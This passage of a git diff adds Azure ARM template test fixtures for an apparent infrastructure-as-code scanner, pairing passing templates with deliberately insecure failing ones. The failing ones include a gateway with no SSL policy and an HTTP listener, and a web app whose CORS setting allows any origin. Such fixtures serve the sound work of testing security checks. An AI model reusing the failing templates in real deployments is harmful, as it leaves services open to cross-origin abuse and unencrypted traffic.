"[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_protocolversion_and_cipher_pass", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Custom", + "minProtocolVersion": "TLSv1_2", + "cipherSuites": [ + "TLS_AES_128_GCM_SHA256", + "TLS_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256" + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json new file mode 100644 index 00000000000..a0bb9a2a128 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json @@ -0,0 +1,276 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "minValue": 1, + "maxValue": 10, + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddressDefault": { + "type": "string", + "metadata": { + "description": "IP Address of Default Backend Server" + } + }, + "backendIpAddressForPathRule1": { + "type": "string", + "metadata": { + "description": "IP Address of Backend Server for Path Rule 1 match" + } + }, + "backendIpAddressForPathRule2": { + "type": "string", + "metadata": { + "description": "IP Address of Backend Server for Path Rule 2 match" + } + }, + "pathMatch1": { + "type": "string", + "metadata": { + "description": "Path match string for Path Rule 1" + } + }, + "pathMatch2": { + "type": "string", + "metadata": { + "description": "Path match string for Path Rule 2" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "location for all resources." + } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2020-08-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2020-08-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "[variables('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "without_sslPolicy_fail", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendPublicIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort80", + "properties": { + "Port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPoolDefault", + "properties": { + "BackendAddresses":[ + { + "IpAddress": "[parameters('backendIpAddressDefault')]" + } + ] + } + }, + { + "name": "appGatewayBackendPool1", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddressForPathRule1')]" + } + ] + } + }, + { + "name": "appGatewayBackendPool2", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddressForPathRule2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendPublicIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort80')]" + }, + "Protocol": "Http" + } + } + ], + "urlPathMaps": [ + { + "name": "urlPathMap1", + "properties": { + "defaultBackendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPoolDefault')]" + }, + "defaultBackendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + }, + "pathRules": [ + { + "name": "pathRule1", + "properties": { + "paths": [ + "[parameters('pathMatch1')]" + ], + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool1')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + }, + { + "name": "pathRule2", + "properties": { + "paths": [ + "[parameters('pathMatch2')]" + ], + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool2')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ] + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "PathBasedRouting", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "urlPathMap": { + "id": "[resourceId('Microsoft.Network/applicationGateways/urlPathMaps',variables('applicationGatewayName'), 'urlPathMap1')]" + } + } + } + ] + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json new file mode 100644 index 00000000000..b889454d7a8 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json @@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "*" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json new file mode 100644 index 00000000000..28a78e3a72c --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json @@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json index 074e4fdfded..04a41face4c 100644 --- a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json +++ b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json @@ -111,7 +111,7 @@ "index.php", "hostingstart.html" ], - "netFrameworkVersion": "v7.0", + "netFrameworkVersion": "v8.0", "phpVersion": "5.6", "requestTracingEnabled": true, "requestTracingExpirationTime": "9999-12-31T23:59:00Z", diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json new file mode 100644 index 00000000000..14ae320416e --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json @@ -0,0 +1,74 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue" : "AzureLinuxApp", + "metadata": { + + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku":{ + "type": "string", + "defaultValue" : "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion" : { + "type": "string", + "defaultValue" : "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/serverfarms", + "apiVersion": "2018-02-01", + "name": "[variables('appServicePlanName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "linux", + "properties":{ + "reserved":true + } + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2018-11-01", + "name": "fail", + "location": "[parameters('location')]", + "kind": "app", + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]" + ], + + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "http20Enabled": "true", + "minTlsVersion": "1.2" + }, + "clientCertEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json new file mode 100644 index 00000000000..523423b63a5 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json @@ -0,0 +1,76 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue" : "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + + "minLength": 2 + }, + "sku":{ + "type": "string", + "defaultValue" : "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion" : { + "type": "string", + "defaultValue" : "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))] " + }, + "resources": [ + { + "type": "Microsoft.Web/serverfarms", + "apiVersion": "2018-02-01", + "name": "[variables('appServicePlanName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "linux", + "properties":{ + "reserved":true + } + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2018-11-01", + "name": "pass", + "location": "[parameters('location')]", + "kind": "app", + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]" + ], + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "http20Enabled": "true", + "minTlsVersion": "1.2" + }, + "clientCertEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json new file mode 100644 index 00000000000..9c56d83f5d5 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "fail", + "properties": { + "publisherEmail": "[parameters('adminEmail')]", + "publisherName": "[parameters('organizationName')]", + "customProperties": "[parameters('customProperties')]" + }, + "siteConfig": { + "javaVersion": "13" + }, + "resources": [], + "dependsOn": [] + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json new file mode 100644 index 00000000000..efc82c16d50 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "pass", + "properties": { + "publisherEmail": "[parameters('adminEmail')]", + "publisherName": "[parameters('organizationName')]", + "customProperties": "[parameters('customProperties')]" + }, + "siteConfig": { + "javaVersion": "17" + }, + "resources": [], + "dependsOn": [] + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json 